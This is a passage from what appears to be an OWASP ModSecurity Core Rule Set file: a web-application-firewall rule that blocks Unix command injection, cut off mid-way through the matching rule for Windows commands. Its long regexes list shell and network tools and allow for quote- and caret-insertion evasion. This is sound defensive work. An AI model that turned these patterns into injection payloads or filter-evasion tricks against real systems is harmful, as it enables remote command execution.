\\\'\"]{0,2}h)|r[\\\\'\"]{0,2}a[\\\\'\"]{0,2}c[\\\\'\"]{0,2}e[\\\\'\"]{0,2}r[\\\\'\"]{0,2}o[\\\\'\"]{0,2}u[\\\\'\"]{0,2}t[\\\\'\"]{0,2}e(?:[\\\\'\"]{0,2}6)?|i[\\\\'\"]{0,2}m[\\\\'\"]{0,2}e(?:[\\\\'\"]{0,2}o[\\\\'\"]{0,2}u[\\\\'\"]{0,2}t)?|e[\\\\'\"]{0,2}l[\\\\'\"]{0,2}n[\\\\'\"]{0,2}e[\\\\'\"]{0,2}t|a[\\\\'\"]{0,2}(?:i[\\\\'\"]{0,2}l(?:[\\\\'\"]{0,2}f)?|r)|o[\\\\'\"]{0,2}(?:u[\\\\'\"]{0,2}c[\\\\'\"]{0,2}h|p)|y[\\\\'\"]{0,2}p[\\\\'\"]{0,2}e)|m[\\\\'\"]{0,2}(?:y[\\\\'\"]{0,2}s[\\\\'\"]{0,2}q[\\\\'\"]{0,2}l(?:[\\\\'\"]{0,2}(?:d[\\\\'\"]{0,2}u[\\\\'\"]{0,2}m[\\\\'\"]{0,2}p(?:[\\\\'\"]{0,2}s[\\\\'\"]{0,2}l[\\\\'\"]{0,2}o[\\\\'\"]{0,2}w)?|h[\\\\'\"]{0,2}o[\\\\'\"]{0,2}t[\\\\'\"]{0,2}c[\\\\'\"]{0,2}o[\\\\'\"]{0,2}p[\\\\'\"]{0,2}y|a[\\\\'\"]{0,2}d[\\\\'\"]{0,2}m[\\\\'\"]{0,2}i[\\\\'\"]{0,2}n|s[\\\\'\"]{0,2}h[\\\\'\"]{0,2}o[\\\\'\"]{0,2}w))?|l[\\\\'\"]{0,2}o[\\\\'\"]{0,2}c[\\\\'\"]{0,2}a[\\\\'\"]{0,2}t[\\\\'\"]{0,2}e|o[\\\\'\"]{0,2}(?:u[\\\\'\"]{0,2}n[\\\\'\"]{0,2}t|r[\\\\'\"]{0,2}e)|a[\\\\'\"]{0,2}i[\\\\'\"]{0,2}l[\\\\'\"]{0,2}q|k[\\\\'\"]{0,2}d[\\\\'\"]{0,2}i[\\\\'\"]{0,2}r|v)|r[\\\\'\"]{0,2}(?:e[\\\\'\"]{0,2}(?:(?:p[\\\\'\"]{0,2}l[\\\\'\"]{0,2}a[\\\\'\"]{0,2}c|n[\\\\'\"]{0,2}a[\\\\'\"]{0,2}m)[\\\\'\"]{0,2}e|a[\\\\'\"]{0,2}l[\\\\'\"]{0,2}p[\\\\'\"]{0,2}a[\\\\'\"]{0,2}t[\\\\'\"]{0,2}h|s[\\\\'\"]{0,2}e[\\\\'\"]{0,2}t)|u[\\\\'\"]{0,2}b[\\\\'\"]{0,2}y(?:[\\\\'\"]{0,2}(?:1(?:[\\\\'\"]{0,2}[89])?|2[\\\\'\"]{0,2}[012]))?|m(?:[\\\\'\"]{0,2}d[\\\\'\"]{0,2}i[\\\\'\"]{0,2}r)?|n[\\\\'\"]{0,2}a[\\\\'\"]{0,2}n[\\\\'\"]{0,2}o|o[\\\\'\"]{0,2}u[\\\\'\"]{0,2}t[\\\\'\"]{0,2}e|s[\\\\'\"]{0,2}y[\\\\'\"]{0,2}n[\\\\'\"]{0,2}c|a[\\\\'\"]{0,2}r|c[\\\\'\"]{0,2}p|p[\\\\'\"]{0,2}m)|b[\\\\'\"]{0,2}(?:z[\\\\'\"]{0,2}(?:(?:[ef][\\\\'\"]{0,2})?g[\\\\'\"]{0,2}r[\\\\'\"]{0,2}e[\\\\'\"]{0,2}p|d[\\\\'\"]{0,2}i[\\\\'\"]{0,2}f[\\\\'\"]{0,2}f|l[\\\\'\"]{0,2}e[\\\\'\"]{0,2}s[\\\\'\"]{0,2}s|m[\\\\'\"]{0,2}o[\\\\'\"]{0,2}r[\\\\'\"]{0,2}e|c[\\\\'\"]{0,2}a[\\\\'\"]{0,2}t|i[\\\\'\"]{0,2}p[\\\\'\"]{0,2}2)|s[\\\\'\"]{0,2}d[\\\\'\"]{0,2}(?:c[\\\\'\"]{0,2}a[\\\\'\"]{0,2}t|i[\\\\'\"]{0,2}f[\\\\'\"]{0,2}f|t[\\\\'\"]{0,2}a[\\\\'\"]{0,2}r)|a[\\\\'\"]{0,2}s[\\\\'\"]{0,2}h)|c[\\\\'\"]{0,2}(?:[cdp]|h[\\\\'\"]{0,2}(?:(?:a[\\\\'\"]{0,2}t[\\\\'\"]{0,2}t|d[\\\\'\"]{0,2}i)[\\\\'\"]{0,2}r|f[\\\\'\"]{0,2}l[\\\\'\"]{0,2}a[\\\\'\"]{0,2}g[\\\\'\"]{0,2}s|m[\\\\'\"]{0,2}o[\\\\'\"]{0,2}d)|o[\\\\'\"]{0,2}m[\\\\'\"]{0,2}p[\\\\'\"]{0,2}r[\\\\'\"]{0,2}e[\\\\'\"]{0,2}s[\\\\'\"]{0,2}s|r[\\\\'\"]{0,2}o[\\\\'\"]{0,2}n[\\\\'\"]{0,2}t[\\\\'\"]{0,2}a[\\\\'\"]{0,2}b|u[\\\\'\"]{0,2}r[\\\\'\"]{0,2}l|a[\\\\'\"]{0,2}t|s[\\\\'\"]{0,2}h)|h[\\\\'\"]{0,2}(?:t[\\\\'\"]{0,2}(?:d[\\\\'\"]{0,2}i[\\\\'\"]{0,2}g[\\\\'\"]{0,2}e[\\\\'\"]{0,2}s[\\\\'\"]{0,2}t|p[\\\\'\"]{0,2}a[\\\\'\"]{0,2}s[\\\\'\"]{0,2}s[\\\\'\"]{0,2}w[\\\\'\"]{0,2}d)|o[\\\\'\"]{0,2}s[\\\\'\"]{0,2}t[\\\\'\"]{0,2}(?:n[\\\\'\"]{0,2}a[\\\\'\"]{0,2}m[\\\\'\"]{0,2}e|i[\\\\'\"]{0,2}d)|i[\\\\'\"]{0,2}s[\\\\'\"]{0,2}t[\\\\'\"]{0,2}o[\\\\'\"]{0,2}r[\\\\'\"]{0,2}y|e[\\\\'\"]{0,2}(?:a[\\\\'\"]{0,2}d|l[\\\\'\"]{0,2}p))|x[\\\\'\"]{0,2}(?:z(?:[\\\\'\"]{0,2}(?:(?:[ef][\\\\'\"]{0,2})?g[\\\\'\"]{0,2}r[\\\\'\"]{0,2}e[\\\\'\"]{0,2}p|d[\\\\'\"]{0,2}(?:i[\\\\'\"]{0,2}f[\\\\'\"]{0,2}f|e[\\\\'\"]{0,2}c)|c[\\\\'\"]{0,2}(?:a[\\\\'\"]{0,2}t|m[\\\\'\"]{0,2}p)|l[\\\\'\"]{0,2}e[\\\\'\"]{0,2}s[\\\\'\"]{0,2}s|m[\\\\'\"]{0,2}o[\\\\'\"]{0,2}r[\\\\'\"]{0,2}e))?|a[\\\\'\"]{0,2}r[\\\\'\"]{0,2}g[\\\\'\"]{0,2}s|t[\\\\'\"]{0,2}e[\\\\'\"]{0,2}r[\\\\'\"]{0,2}m)|e[\\\\'\"]{0,2}(?:x[\\\\'\"]{0,2}(?:p[\\\\'\"]{0,2}(?:a[\\\\'\"]{0,2}n[\\\\'\"]{0,2}d|o[\\\\'\"]{0,2}r[\\\\'\"]{0,2}t|r)|e[\\\\'\"]{0,2}c|i[\\\\'\"]{0,2}t)|n[\\\\'\"]{0,2}v(?:[\\\\'\"]{0,2}-[\\\\'\"]{0,2}u[\\\\'\"]{0,2}p[\\\\'\"]{0,2}d[\\\\'\"]{0,2}a[\\\\'\"]{0,2}t[\\\\'\"]{0,2}e)?|g[\\\\'\"]{0,2}r[\\\\'\"]{0,2}e[\\\\'\"]{0,2}p|c[\\\\'\"]{0,2}h[\\\\'\"]{0,2}o|v[\\\\'\"]{0,2}a[\\\\'\"]{0,2}l)|i[\\\\'\"]{0,2}(?:p[\\\\'\"]{0,2}(?:(?:6[\\\\'\"]{0,2})?t[\\\\'\"]{0,2}a[\\\\'\"]{0,2}b[\\\\'\"]{0,2}l[\\\\'\"]{0,2}e[\\\\'\"]{0,2}s|c[\\\\'\"]{0,2}o[\\\\'\"]{0,2}n[\\\\'\"]{0,2}f[\\\\'\"]{0,2}i[\\\\'\"]{0,2}g)|f[\\\\'\"]{0,2}c[\\\\'\"]{0,2}o[\\\\'\"]{0,2}n[\\\\'\"]{0,2}f[\\\\'\"]{0,2}i[\\\\'\"]{0,2}g|r[\\\\'\"]{0,2}b(?:[\\\\'\"]{0,2}(?:1(?:[\\\\'\"]{0,2}[89])?|2[\\\\'\"]{0,2}[012]))?|d)|z[\\\\'\"]{0,2}(?:(?:(?:[ef][\\\\'\"]{0,2})?g[\\\\'\"]{0,2}r[\\\\'\"]{0,2}e|i)[\\\\'\"]{0,2}p|c[\\\\'\"]{0,2}(?:a[\\\\'\"]{0,2}t|m[\\\\'\"]{0,2}p)|d[\\\\'\"]{0,2}i[\\\\'\"]{0,2}f[\\\\'\"]{0,2}f|l[\\\\'\"]{0,2}e[\\\\'\"]{0,2}s[\\\\'\"]{0,2}s|m[\\\\'\"]{0,2}o[\\\\'\"]{0,2}r[\\\\'\"]{0,2}e|r[\\\\'\"]{0,2}u[\\\\'\"]{0,2}n|s[\\\\'\"]{0,2}h)|u[\\\\'\"]{0,2}n[\\\\'\"]{0,2}(?:c[\\\\'\"]{0,2}o[\\\\'\"]{0,2}m[\\\\'\"]{0,2}p[\\\\'\"]{0,2}r[\\\\'\"]{0,2}e[\\\\'\"]{0,2}s[\\\\'\"]{0,2}s|l[\\\\'\"]{0,2}z[\\\\'\"]{0,2}m[\\\\'\"]{0,2}a|a[\\\\'\"]{0,2}m[\\\\'\"]{0,2}e|r[\\\\'\"]{0,2}a[\\\\'\"]{0,2}r|z[\\\\'\"]{0,2}i[\\\\'\"]{0,2}p|x[\\\\'\"]{0,2}z)|f[\\\\'\"]{0,2}(?:t[\\\\'\"]{0,2}p(?:[\\\\'\"]{0,2}(?:s[\\\\'\"]{0,2}t[\\\\'\"]{0,2}a[\\\\'\"]{0,2}t[\\\\'\"]{0,2}s|w[\\\\'\"]{0,2}h[\\\\'\"]{0,2}o))?|e[\\\\'\"]{0,2}t[\\\\'\"]{0,2}c[\\\\'\"]{0,2}h|g[\\\\'\"]{0,2}r[\\\\'\"]{0,2}e[\\\\'\"]{0,2}p|i[\\\\'\"]{0,2}n[\\\\'\"]{0,2}d|o[\\\\'\"]{0,2}r|c)|d[\\\\'\"]{0,2}(?:h[\\\\'\"]{0,2}c[\\\\'\"]{0,2}l[\\\\'\"]{0,2}i[\\\\'\"]{0,2}e[\\\\'\"]{0,2}n[\\\\'\"]{0,2}t|(?:m[\\\\'\"]{0,2}e[\\\\'\"]{0,2}s|p[\\\\'\"]{0,2}k)[\\\\'\"]{0,2}g|a[\\\\'\"]{0,2}(?:s[\\\\'\"]{0,2}h|t[\\\\'\"]{0,2}e)|i[\\\\'\"]{0,2}f[\\\\'\"]{0,2}f|u)|w[\\\\'\"]{0,2}(?:h[\\\\'\"]{0,2}(?:i[\\\\'\"]{0,2}(?:c[\\\\'\"]{0,2}h|l[\\\\'\"]{0,2}e)|o(?:[\\\\'\"]{0,2}a[\\\\'\"]{0,2}m[\\\\'\"]{0,2}i)?)|r[\\\\'\"]{0,2}i[\\\\'\"]{0,2}t[\\\\'\"]{0,2}e|g[\\\\'\"]{0,2}e[\\\\'\"]{0,2}t|3[\\\\'\"]{0,2}m)|g[\\\\'\"]{0,2}(?:(?:u[\\\\'\"]{0,2}n[\\\\'\"]{0,2}z[\\\\'\"]{0,2}i|r[\\\\'\"]{0,2}e)[\\\\'\"]{0,2}p|z[\\\\'\"]{0,2}(?:c[\\\\'\"]{0,2}a[\\\\'\"]{0,2}t|i[\\\\'\"]{0,2}p)|c[\\\\'\"]{0,2}c|d[\\\\'\"]{0,2}b|i[\\\\'\"]{0,2}t)|a[\\\\'\"]{0,2}(?:p[\\\\'\"]{0,2}t[\\\\'\"]{0,2}-[\\\\'\"]{0,2}g[\\\\'\"]{0,2}e[\\\\'\"]{0,2}t|l[\\\\'\"]{0,2}i[\\\\'\"]{0,2}a[\\\\'\"]{0,2}s|r[\\\\'\"]{0,2}(?:c[\\\\'\"]{0,2}h|p))|j[\\\\'\"]{0,2}(?:e[\\\\'\"]{0,2}x[\\\\'\"]{0,2}e[\\\\'\"]{0,2}c|a[\\\\'\"]{0,2}v[\\\\'\"]{0,2}a)|k[\\\\'\"]{0,2}i(?:[\\\\'\"]{0,2}l[\\\\'\"]{0,2}l[\\\\'\"]{0,2}a)?[\\\\'\"]{0,2}l[\\\\'\"]{0,2}l|o[\\\\'\"]{0,2}p[\\\\'\"]{0,2}e[\\\\'\"]{0,2}n(?:[\\\\'\"]{0,2}s[\\\\'\"]{0,2}s[\\\\'\"]{0,2}l)?|(?:v[\\\\'\"]{0,2}i|y[\\\\'\"]{0,2}u)[\\\\'\"]{0,2}m|7[\\\\'\"]{0,2}z(?:[\\\\'\"]{0,2}[ar])?|G[\\\\'\"]{0,2}E[\\\\'\"]{0,2}T)(\.\w+)?\b" \
    "msg:'Remote Command Execution: Unix command injection',\
    phase:request,\
    rev:'3',\
    ver:'OWASP_CRS/3.0.0',\
    maturity:'8',\
    accuracy:'8',\
    capture,\
    t:none,\
    ctl:auditLogParts=+E,\
    block,\
    id:932100,\
    tag:'application-multi',\
    tag:'language-multi',\
    tag:'platform-multi',\
    tag:'attack-rce',\
    tag:'OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION',\
    tag:'WASCTC/WASC-31',\
    tag:'OWASP_TOP_10/A1',\
    tag:'PCI/6.5.2',\
    logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
    severity:'CRITICAL',\
    setvar:'tx.msg=%{rule.msg}',\
    setvar:tx.rce_score=+%{tx.critical_anomaly_score},\
    setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},\
    setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/RCE-%{matched_var_name}=%{tx.0}"

# Windows commands
SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)(?:^|;|\{|\||\|\||&|&&|\n|\r|\$\(|\$\(\(|`|\${|<\(|>\()\s*(?:{|\(|[\w\d_]+=.*)*\s*(?:'|\")*(?:[\w\d'\"\./]+/|[\\\\'\"\^]*\w[\\\\'\"\^]*:.*\\\\|[\^\.\w\d '\"/\\\\]*\\\\)?['\"]*[\\\\'\"\^]?(?:p[\"\^]{0,2}(?:s(?:[\"\^]{0,2}(?:s[\"\^]{0,2}(?:h[\"\^]{0,2}u[\"\^]{0,2}t[\"\^]{0,2}d[\"\^]{0,2}o[\"\^]{0,2}w[\"\^]{0,2}n|e[\"\^]{0,2}r[\"\^]{0,2}v[\"\^]{0,2}i[\"\^]{0,2}c[\"\^]{0,2}e|u[\"\^]{0,2}s[\"\^]{0,2}p[\"\^]{0,2}e[\"\^]{0,2}n[\"\^]{0,2}d)|l[\"\^]{0,2}(?:o[\"\^]{0,2}g[\"\^]{0,2}(?:g[\"\^]{0,2}e[\"\^]{0,2}d[\"\^]{0,2}o[\"\^]{0,2}n|l[\"\^]{0,2}i[\"\^]{0,2}s[\"\^]{0,2}t)|i[\"\^]{0,2}s[\"\^]{0,2}t)|p[\"\^]{0,2}(?:a[\"\^]{0,2}s[\"\^]{0,2}s[\"\^]{0,2}w[\"\^]{0,2}d|i[\"\^]{0,2}n[\"\^]{0,2}g)|g[\"\^]{0,2}e[\"\^]{0,2}t[\"\^]{0,2}s[\"\^]{0,2}i[\"\^]{0,2}d|e[\"\^]{0,2}x[\"\^]{0,2}e[\"\^]{0,2}c|f[\"\^]{0,2}i[\"\^]{0,2}l[\"\^]{0,2}e|i[\"\^]{0,2}n[\"\^]{0,2}f[\"\^]{0,2}o|k[\"\^]{0,2}i[\"\^]{0,2}l[\"\^]{0,2}l))?|r[\"\^]{0,2}(?:n[\"\^]{0,2}(?:c[\"\^]{0,2}n[\"\^]{0,2}f[\"\^]{0,2}g|m[\"\^]{0,2}n[\"\^]{0,2}g[\"\^]{0,2}r)|i[\"\^]{0,2}n[\"\^]{0,2}t(?:[\"\^]{0,2}b[\"\^]{0,2}r[\"\^]{0,2}m)?|o[\"\^]{0,2}m[\"\^]{0,2}p[\"\^]{0,2}t)|o[\"\^]{0,2}(?:w[\"\^]{0,2}e[\"\^]{0,2}r[\"\^]{0,2}(?:s[\"\^]{0,2}h[\"\^]{0,2}e[\"\^]{0,2}l[\"\^]{0,2}l|c[\"\^]{0,2}f[\"\^]{0,2}g)|r[\"\^]{0,2}t[\"\^]{0,2}q[\"\^]{0,2}r[\"\^]{0,2}y|p[\"\^]{0,2}d)|a[\"\^]{0,2}(?:t[\"\^]{0,2}h(?:[\"\^]{0,2}p[\"\^]{0,2}i[\"\^]{0,2}n[\"\^]{0,2}g)?|u[\"\^]{0,2}s[\"\^]{0,2}e)|e[\"\^]{0,2}r[\"\^]{0,2}(?:f[\"\^]{0,2}m[\"\^]{0,2}o[\"\^]{0,2}n|l(?:[\"\^]{0,2}(?:s[\"\^]{0,2}h|5))?)|y[\"\^]{0,2}t[\"\^]{0,2}h[\"\^]{0,2}o[\"\^]{0,2}n(?:[\"\^]{0,2}(?:3(?:[\"\^]{0,2}m)?|2))?|k[\"\^]{0,2}g[\"\^]{0,2}m[\"\^]{0,2}g[\"\^]{0,2}r|u[\"\^]{0,2}s[\"\^]{0,2}h[\"\^]{0,2}d|h[\"\^]{0,2}p(?:[\"\^]{0,2}[57])?|i[\"\^]{0,2}n[\"\^]{0,2}g)|s[\"\^]{0,2}(?:h[\"\^]{0,2}(?:o[\"\^]{0,2}(?:w[\"\^]{0,2}(?:g[\"\^]{0,2}r[\"\^]{0,2}p|m[\"\^]{0,2}b[\"\^]{0,2}r)[\"\^]{0,2}s|r[\"\^]{0,2}t[\"\^]{0,2}c[\"\^]{0,2}u[\"\^]{0,2}t)|e[\"\^]{0,2}l[\"\^]{0,2}l[\"\^]{0,2}r[\"\^]{0,2}u[\"\^]{0,2}n[\"\^]{0,2}a[\"\^]{0,2}s|u[\"\^]{0,2}t[\"\^]{0,2}d[\"\^]{0,2}o[\"\^]{0,2}w[\"\^]{0,2}n|a[\"\^]{0,2}r[\"\^]{0,2}e|i[\"\^]{0,2}f[\"\^]{0,2}t)|e[\"\^]{0,2}(?:t(?:[\"\^]{0,2}(?:l[\"\^]{0,2}o[\"\^]{0,2}c[\"\^]{0,2}a[\"\^]{0,2}l|x))?|l[\"\^]{0,2}e[\"\^]{0,2}c[\"\^]{0,2}t)|c(?:[\"\^]{0,2}(?:h[\"\^]{0,2}t[\"\^]{0,2}a[\"\^]{0,2}s[\"\^]{0,2}k[\"\^]{0,2}s|l[\"\^]{0,2}i[\"\^]{0,2}s[\"\^]{0,2}t))?|y[\"\^]{0,2}s[\"\^]{0,2}t[\"\^]{0,2}e[\"\^]{0,2}m[\"\^]{0,2}i[\"\^]{0,2}n[\"\^]{0,2}f[\"\^]{0,2}o|u[\"\^]{0,2}b[\"\^]{0,2}(?:i[\"\^]{0,2}n[\"\^]{0,2}a[\"\^]{0,2}c[\"\^]{0,2}l|s[\"\^]{0,2}t)|l(?:[\"\^]{0,2}(?:e[\"\^]{0,2}e[\"\^]{0,2}p|m[\"\^]{0,2}g[\"\^]{0,2}r))?|p(?:[\"\^]{0,2}(?:j[\"\^]{0,2}b|p[\"\^]{0,2}s|s[\"\^]{0,2}v))?|a[\"\^]{0,2}(?:j[\"\^]{0,2}b|p[\"\^]{0,2}s|s[\"\^]{0,2}v|l)|o[\"\^]{0,2}(?:o[\"\^]{0,2}n|r[\"\^]{0,2}t)|t[\"\^]{0,2}a[\"\^]{0,2}r[\"\^]{0,2}t|(?:w[\"\^]{0,2}m[\"\^]{0,2})?i|v(?:[\"\^]{0,2}n)?|b[\"\^]{0,2}p|f[\"\^]{0,2}c)|c[\"\^]{0,2}(?:l[\"\^]{0,2}(?:[cpsv]|e[\"\^]{0,2}a[\"\^]{0,2}(?:r(?:[\"\^]{0,2}m[\"\^]{0,2}e[\"\^]{0,2}m)?|n[\"\^]{0,2}m[\"\^]{0,2}g[\"\^]{0,2}r)|u[\"\^]{0,2}s[\"\^]{0,2}t[\"\^]{0,2}e[\"\^]{0,2}r|i(?:[\"\^]{0,2}p)?|h[\"\^]{0,2}y)|o[\"\^]{0,2}(?:m[\"\^]{0,2}p(?:[\"\^]{0,2}a[\"\^]{0,2}(?:c[\"\^]{0,2}t|r[\"\^]{0,2}e))?|n[\"\^]{0,2}(?:2[\"\^]{0,2}p|v[\"\^]{0,2}e)[\"\^]{0,2}r[\"\^]{0,2}t|l[\"\^]{0,2}o[\"\^]{0,2}r|p[\"\^]{0,2}y)|h[\"\^]{0,2}(?:k[\"\^]{0,2}(?:n[\"\^]{0,2}t[\"\^]{0,2}f[\"\^]{0,2}s|d[\"\^]{0,2}s[\"\^]{0,2}k)|(?:a[\"\^]{0,2}n[\"\^]{0,2}g|o[\"\^]{0,2}i[\"\^]{0,2}c)[\"\^]{0,2}e|d[\"\^]{0,2}i[\"\^]{0,2}r)|s[\"\^]{0,2}(?:c[\"\^]{0,2}(?:r[\"\^]{0,2}i[\"\^]{0,2}p[\"\^]{0,2}t|c[\"\^]{0,2}m[\"\^]{0,2}d)|v[\"\^]{0,2}d[\"\^]{0,2}e)|e[\"\^]{0,2}r[\"\^]{0,2}t[\"\^]{0,2}(?:u[\"\^]{0,2}t[\"\^]{0,2}i[\"\^]{0,2}l|r[\"\^]{0,2}e[\"\^]{0,2}q)|a[\"\^]{0,2}(?:c[\"\^]{0,2}l[\"\^]{0,2}s|l[\"\^]{0,2}l|t)|m[\"\^]{0,2}d(?:[\"\^]{0,2}k[\"\^]{0,2}e[\"\^]{0,2}y)?|i[\"\^]{0,2}p[\"\^]{0,2}h[\"\^]{0,2}e[\"\^]{0,2}r|u[\"\^]{0,2}r[\"\^]{0,2}l|v[\"\^]{0,2}p[\"\^]{0,2}a|p(?:[\"\^]{0,2}[ip])?|d)|r[\"\^]{0,2}(?:e[\"\^]{0,2}(?:g(?:[\"\^]{0,2}(?:s[\"\^]{0,2}v[\"\^]{0,2}r[\"\^]{0,2}3[\"\^]{0,2}2|e[\"\^]{0,2}d[\"\^]{0,2}i[\"\^]{0,2}t|i[\"\^]{0,2}n[\"\^]{0,2}i))?|c[\"\^]{0,2}o[\"\^]{0,2}v[\"\^]{0,2}e[\"\^]{0,2}r|p[\"\^]{0,2}l[\"\^]{0,2}a[\"\^]{0,2}c[\"\^]{0,2}e|n(?:[\"\^]{0,2}a[\"\^]{0,2}m[\"\^]{0,2}e)?|s[\"\^]{0,2}e[\"\^]{0,2}t|m)|u[\"\^]{0,2}(?:n(?:[\"\^]{0,2}(?:d[\"\^]{0,2}l[\"\^]{0,2}l[\"\^]{0,2}3[\"\^]{0,2}2|a[\"\^]{0,2}s))?|b[\"\^]{0,2}y[\"\^]{0,2}(?:1(?:[\"\^]{0,2}[89])?|2[\"\^]{0,2}[012]))|a[\"\^]{0,2}(?:s[\"\^]{0,2}(?:p[\"\^]{0,2}h[\"\^]{0,2}o[\"\^]{0,2}n[\"\^]{0,2}e|d[\"\^]{0,2}i[\"\^]{0,2}a[\"\^]{0,2}l)|r)|m(?:[\"\^]{0,2}(?:t[\"\^]{0,2}s[\"\^]{0,2}h[\"\^]{0,2}a[\"\^]{0,2}r[\"\^]{0,2}e|d[\"\^]{0,2}i[\"\^]{0,2}r|o))?|o[\"\^]{0,2}(?:b[\"\^]{0,2}o[\"\^]{0,2}c[\"\^]{0,2}o[\"\^]{0,2}p[\"\^]{0,2}y|u[\"\^]{0,2}t[\"\^]{0,2}e)|s[\"\^]{0,2}(?:y[\"\^]{0,2}n[\"\^]{0,2}c|n(?:[\"\^]{0,2}p)?)|(?:c[\"\^]{0,2})?j[\"\^]{0,2}b|(?:w[\"\^]{0,2}m[\"\^]{0,2})?i|v(?:[\"\^]{0,2}p[\"\^]{0,2}a)?|(?:b[\"\^]{0,2})?p|d(?:[\"\^]{0,2}r)?|n[\"\^]{0,2}[ip])|m[\"\^]{0,2}(?:[pv]|y[\"\^]{0,2}s[\"\^]{0,2}q[\"\^]{0,2}l(?:[\"\^]{0,2}(?:d[\"\^]{0,2}u[\"\^]{0,2}m[\"\^]{0,2}p(?:[\"\^]{0,2}s[\"\^]{0,2}l[\"\^]{0,2}o[\"\^]{0,2}w)?|h[\"\^]{0,2}o[\"\^]{0,2}t[\"\^]{0,2}c[\"\^]{0,2}o[\"\^]{0,2}p[\"\^]{0,2}y|a[\"\^]{0,2}d[\"\^]{0,2}m[\"\^]{0,2}i[\"\^]{0,2}n|s[\"\^]{0,2}h[\"\^]{0,2}o[\"\^]{0,2}w))?|o[\"\^]{0,2}(?:u[\"\^]{0,2}n[\"\^]{0,2}t(?:[\"\^]{0,2}v[\"\^]{0,2}o[\"\^]{0,2}l)?|v[\"\^]{0,2}e(?:[\"\^]{0,2}u[\"\^]{0,2}s[\"\^]{0,2}e[\"\^]{0,2}r)?|[dr][\"\^]{0,2}e)|s[\"\^]{0,2}(?:i[\"\^]{0,2}(?:n[\"\^]{0,2}f[\"\^]{0,2}o[\"\^]{0,2}3[\"\^]{0,2}2|e[\"\^]{0,2}x[\"\^]{0,2}e[\"\^]{0,2}c)|t[\"\^]{0,2}s[\"\^]{0,2}c|g)|k[\"\^]{0,2}(?:l[\"\^]{0,2}i[\"\^]{0,2}n[\"\^]{0,2}k|d[\"\^]{0,2}i[\"\^]{0,2}r)|(?:a[\"\^]{0,2}p[\"\^]{0,2}i[\"\^]{0,2}s[\"\^]{0,2}e[\"\^]{0,2}n[\"\^]{0,2})?d|e[\"\^]{0,2}(?:a[\"\^]{0,2}s[\"\^]{0,2}u[\"\^]{0,2}r[\"\^]{0,2}e|m)|(?:b[\"\^]{0,2}s[\"\^]{0,2}a[\"\^]{0,2}c[\"\^]{0,2}l[\"\^]{0,2})?i)|d[\"\^]{0,2}(?:e[\"\^]{0,2}(?:l(?:[\"\^]{0,2}(?:p[\"\^]{0,2}r[\"\^]{0,2}o[\"\^]{0,2}f|t[\"\^]{0,2}r[\"\^]{0,2}e[\"\^]{0,2}e))?|v[\"\^]{0,2}(?:m[\"\^]{0,2}g[\"\^]{0,2}m[\"\^]{0,2}t|c[\"\^]{0,2}o[\"\^]{0,2}n)|(?:f[\"\^]{0,2}r[\"\^]{0,2}a|b[\"\^]{0,2}u)[\"\^]{0,2}g)|s[\"\^]{0,2}(?:a[\"\^]{0,2}(?:c[\"\^]{0,2}l[\"\^]{0,2}s|d[\"\^]{0,2}d)|q[\"\^]{0,2}u[\"\^]{0,2}e[\"\^]{0,2}r[\"\^]{0,2}y|m[\"\^]{0,2}o[\"\^]{0,2}(?:v[\"\^]{0,2}e|d)|g[\"\^]{0,2}e[\"\^]{0,2}t|r[\"\^]{0,2}m)|i[\"\^]{0,2}(?:s[\"\^]{0,2}k[\"\^]{0,2}(?:s[\"\^]{0,2}h[\"\^]{0,2}a[\"\^]{0,2}d[\"\^]{0,2}o[\"\^]{0,2}w|p[\"\^]{0,2}a[\"\^]{0,2}r[\"\^]{0,2}t)|r(?:[\"\^]{0,2}u[\"\^]{0,2}s[\"\^]{0,2}e)?|f[\"\^]{0,2}f)|(?:r[\"\^]{0,2}i[\"\^]{0,2}v[\"\^]{0,2}e[\"\^]{0,2}r[\"\^]{0,2}q[\"\^]{0,2}u[\"\^]{0,2}e[\"\^]{0,2}r|o[\"\^]{0,2}s[\"\^]{0,2}k[\"\^]{0,2}e)[\"\^]{0,2}y|n[\"\^]{0,2}s[\"\^]{0,2}s[\"\^]{0,2}t[\"\^]{0,2}a[\"\^]{0,2}t|a[\"\^]{0,2}t[\"\^]{0,2}e|b[\"\^]{0,2}p)|g[\"\^]{0,2}(?:[uv]|a[\"\^]{0,2}(?:t[\"\^]{0,2}h[\"\^]{0,2}e[\"\^]{0,2}r[\"\^]{0,2}n[\"\^]{0,2}e[\"\^]{0,2}t[\"\^]{0,2}w[\"\^]{0,2}o[\"\^]{0,2}r[\"\^]{0,2}k[\"\^]{0,2}i[\"\^]{0,2}n[\"\^]{0,2}f[\"\^]{0,2}o|l)|p(?:[\"\^]{0,2}(?:r[\"\^]{0,2}e[\"\^]{0,2}s[\"\^]{0,2}u[\"\^]{0,2}l[\"\^]{0,2}t|u[\"\^]{0,2}p[\"\^]{0,2}d[\"\^]{0,2}a[\"\^]{0,2}t[\"\^]{0,2}e|s))?|(?:l[\"\^]{0,2}o[\"\^]{0,2}b[\"\^]{0,2}a[\"\^]{0,2})?l|e[\"\^]{0,2}t[\"\^]{0,2}m[\"\^]{0,2}a[\"\^]{0,2}c|(?:r[\"\^]{0,2}o[\"\^]{0,2}u|b)[\"\^]{0,2}p|s[\"\^]{0,2}(?:n(?:[\"\^]{0,2}p)?|v)|o[\"\^]{0,2}t[\"\^]{0,2}o|w[\"\^]{0,2}m[\"\^]{0,2}i|c(?:[\"\^]{0,2}[ims])?|i(?:[\"\^]{0,2}t)?|m(?:[\"\^]{0,2}o)?|j[\"\^]{0,2}b)|t[\"\^]{0,2}(?:a[\"\^]{0,2}(?:s[\"\^]{0,2}k[\"\^]{0,2}(?:k[\"\^]{0,2}i[\"\^]{0,2}l[\"\^]{0,2}l|l[\"\^]{0,2}i[\"\^]{0,2}s[\"\^]{0,2}t)|k[\"\^]{0,2}e[\"\^]{0,2}o[\"\^]{0,2}w[\"\^]{0,2}n)|s[\"\^]{0,2}(?:d[\"\^]{0,2}i[\"\^]{0,2}s[\"\^]{0,2}c[\"\^]{0,2}o|s[\"\^]{0,2}h[\"\^]{0,2}u[\"\^]{0,2}t[\"\^]{0,2}d)[\"\^]{0,2}n|i[\"\^]{0,2}(?:m[\"\^]{0,2}e(?:[\"\^]{0,2}o[\"\^]{0,2}u[\"\^]{0,2